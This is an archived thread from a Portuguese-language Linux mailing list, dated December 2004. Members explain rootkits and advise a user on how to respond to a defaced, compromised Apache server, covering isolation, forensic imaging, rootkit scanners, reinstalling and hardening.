instalação destes rootkits via > firewall ou outro método ? Uma supervisão da máquina, restrição de acesso, execução apenas dos serviços estritamente necessários, etc.  Há normas para segurança e determinação do grau de segurança de uma instalação ou sistema. Mas, *evitar* é uma coisa extremamente difícil, você pode *dificultar*. É o mesmo que acontece com assaltos a bancos, por exemplo: evitar eles não conseguem, mas tornam a dificuldade bastante alta e isso exige uma especialização dos assaltantes e um aumento do investimento que eles devem fazer para obter sucesso. > O que o hacker deseja ao instalar estes rootkits ? Adivinhe? :-)  Garantir o acesso futuro à máquina, obter permissões de superusuário, etc. Geralmente, entretanto, a instalação é feita por crackers e não por hackers. -- Godoy.     ******************************************** De:  Jorge Godoy Para:  Aguiar Magalhaes Cc:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br) O que são programas LKM Data:  Thu, 02 Dec 2004 15:04:17 -0200 Aguiar Magalhaes writes: > você acha que instalar uma distro mais recente pode evitar a > instalação de rootkits? Uma distribuição mais recente elimina falhas de segurança já conhecidas e que não tiveram atualizações para a versão mais antiga.  A Conectiva, por exemplo, não dá mais suporte a diversas versões de suas distribuição que *ainda* estão em uso por aí.  Se esses usuários não aplicam as atualizações por conta própria, correm o risco de ter vulnerabilidades em suas máquinas que podem levar a algum tipo de comprometimento. -- Godoy.     ******************************************** De:  Alejandro Flores Responder-a:  Alejandro Flores Para:  Tekko Cc:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)Servidor Apache invadido Data:  Fri, 3 Dec 2004 16:47:13 -0300 Olá, > Hoje ao chegar no escritorio, encontrei a pagina inicial do servidor apache > modificada ( deface ) Hmm, que bela manhã você deve ter tido. :-) > Encontrei algumas coisa interessantes, como > 1-) 3 novos usuarios cadastrados na maquina > Foram retirados imediatamente Normal numa invasão. Provavelmente com UID=0. > 2-) o /var/log foi totalmente apagado. Acho que vou montar um servidor de > LOG para deixar mais confiavel. Ja ouviu falar no LIDS? > 3-)Atualizei o apache, o PHP e outros programas que estavam > desatualizadas -> Foi burrada minha não ter atualizado, pois estava cheio de > serviço e acabei deixando pra lá. Eles não perdoam. As vezes nem tem ninguem por trás do ataque. > Imagino que utilizaram um bug do PHP ou apache, conforme pude verificar na > pagina da conectiva. Bom, eles podem ter utilizado um bug no apache ou php para entrar na máquina, mas pra ganhar root privileges, eles tiveram que explorar outra falha. Você tinha SSH habilitado para acesso externo? Tinha algum firewall na borda? Algo que você possa analisar os logs e tentar achar por onde foi a entrada? Antes de mais nada, rode o chkrootkit por exemplo, pra saber aonde eles esconderam as 'ferramentas'. Provavelmente ainda estão no seu sistema. > Acontece que um determinado virtual host ( no caso um de webmail ), não > consigo colocar o site no ar novamente, pois sempre aparece a pagina > modificada. Já mudei a pagina, mas quando vou carregar a pagina index.php, > olhando o codigo fonte da mesma,  carrega algumas linhas delas e depois > carrega a pagina do cara. Mas se olhar a pagina index.php está OK. Veja se não mudaram o DocumentRoot. Verifica se não tem nenhuma linha de 'include' na tua página, chamando algo estranho. Verifica data de modificação do arquivo, etc... Não aconselho a utilizar esse servidor novamente, depois de comprometido e sem ter como analisar profundamente o nível de comprometimento do seu servidor, você não sabe como é fácil eles entrarem de novo. Sua máquina pode estar com vários binários de sistema modificados. Por exemplo, o passwd pode estar 'modificado', e pode enviar a senha nova do root que você trocou logo cedo. O 'ps' pode estar escondendo processos que você não viu que estão la rodando. O ideal quando nos deparamos com um servidor comprometido é: - Tire o cabo de rede primeiro. Se o hacker perceber que foi descoberto e você executou um shutdown na máquina, ele tem tempo de sobra pra danificar seu servidor. - Efetue o shutdown - Utilize um Live CD como o INSERT por exemplo, faça um clone do seu HD - Faça uma análise bem detalhada. Procure pelos arquivos modificados desde a hora X. Procure por diretórios escondidos (diretórios com nome ".. " ponto, ponto, espaço). - Execute um 'vasculhador' de rootkits como o chkrootkit ou o rootkithunter. - Procure determinar o ponto de entrada - Procure pelas ferramentas instaladas - Procure por binários modificados - Se encontrou algum sniffer, é provavel que ele tenha capturado as senhas dos usuários que acessaram o webmail. Em seu novo servidor: Procure utilizar o LIDS caso queira uma segurança EXTRA. Monte as partições dos binários como read-only (/bin, /sbin, /usr) Procure rodar os processos em modo chroot Utilize um IDS de Host (tripwire, hostsentry, AIDE) Tenha um firewall/IDS na entrada da sua rede fazendo log em banco de dados As recomendações e análises são muitas que não cabem num e-mail. Abraço! Alejandro Flores Abraço! ******************************************** De:  Thiago Macieira Para:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)Servidor Apache invadido Data:  Fri, 3 Dec 2004 18:19:44 -0200 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Tekko wrote: >Hoje ao chegar no escritorio, encontrei a pagina inicial do servidor > apache modificada ( deface ) Tire a máquina do ar imediatamente. Faça backup dos seus dados e algumas configurações -- e apenas disso, não inclua programa algum. Formate sua máquina e instale a versão mais recente da sua distribuição. Atualize os programas, se já houver atualizações. Restaure os dados e, manualmente, as configurações. Só depois volte a colocar a máquina no ar. >2-) o /var/log foi totalmente apagado. Acho que vou montar um servidor > de LOG para deixar mais confiavel. Isso é uma boa idéia. >3-)Atualizei o apache, o PHP e outros programas que estavam >desatualizadas -> Foi burrada minha não ter atualizado, pois estava > cheio de serviço e acabei deixando pra lá. Não serve. Formate e instale de novo. >Acontece que um determinado virtual host ( no caso um de webmail ), não >consigo colocar o site no ar novamente, pois sempre aparece a pagina >modificada. Já mudei a pagina, mas quando vou carregar a pagina > index.php, olhando o codigo fonte da mesma,  carrega algumas linhas > delas e depois carrega a pagina do cara. Mas se olhar a pagina > index.php está OK. Formate e instale de novo. >Existe alguma outra coisa que poderia estar fazendo isso? Formatando e instalando de novo. - --   Thiago Macieira  -  Registered Linux user #65028    thiago (AT) macieira (DOT) info ******************************************** De:  Carlos Carvalho Para:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)Servidor Apache invadido Data:  Sat, 04 Dec 2004 02:45:59 -0200 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Ambiente de producao e delicado mesmo. Retirar da producao concordo tem que ser a primeira medida. A segunda deve ser a investigacao de : - - por onde entrou (vulnerabilidade) - - o que foi modificado, verificar as datas de acesso aos arquivos e se possivel (preventivo) alguma ferramenta de checagem de binarios e arquivos - - descobrindo isso ver ate onde o invasor foi, sera que ele comprometeu outras maquinas ou servicos da rede? - - Qual era o interesse e o que motivou o invasor? Algo especifico ou foi apenas mais um alvo na nuvem da internet? Isso tudo deve tomar algum tempo do administrador. mas sera um tempo bem empregado. A solucao mais facil muitas vezes nao e a melhor, infelizmente :( abracos Oseias Ferreira wrote: | On Fri, 3 Dec 2004 16:19:28 -0200 | "Tekko" wrote: | | |>Pessoal, |> |>Hoje ao chegar no escritorio, encontrei a pagina inicial do servidor apache |>modificada ( deface ) |> |>Encontrei algumas coisa interessantes, como |> |>1-) 3 novos usuarios cadastrados na maquina > Foram retirados imediatamente | | | Nestas circunstâncias, eu... | Retirava a máquina de produção, fazia os backups, e formatava a máquina. | Os invasores podem ter deixado algo, para entrarem novamente, e isto é muito provável. | O cara conseguiu permissão para apagar os logs, cadastrar usuários... | | -- | Oseias Ferreira. | Linux Counter #333243 ******************************************** De:  Fabio Guerrazzi Para:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)Servidor Apache invadido Data:  Sat, 4 Dec 2004 19:13:33 -0200 On Sat, 04 Dec 2004 02:45:59 -0200, Carlos Carvalho escreveu: > - - por onde entrou (vulnerabilidade) Uma maneira de invasão comum é por alguém que tem acesso físico à máquina ou conhece a senha do administrador. Não custa lembrar... Fábio. ******************************************** ********************************************